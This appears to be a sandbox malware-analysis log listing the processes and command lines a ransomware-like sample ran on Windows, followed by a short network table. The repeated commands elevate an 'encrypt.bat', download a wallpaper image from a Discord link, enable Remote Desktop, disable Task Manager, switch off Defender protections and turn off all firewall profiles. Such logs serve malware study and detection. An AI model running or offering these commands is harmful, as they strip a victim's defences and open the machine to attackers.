powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4012,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5768 /prefetch:8

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
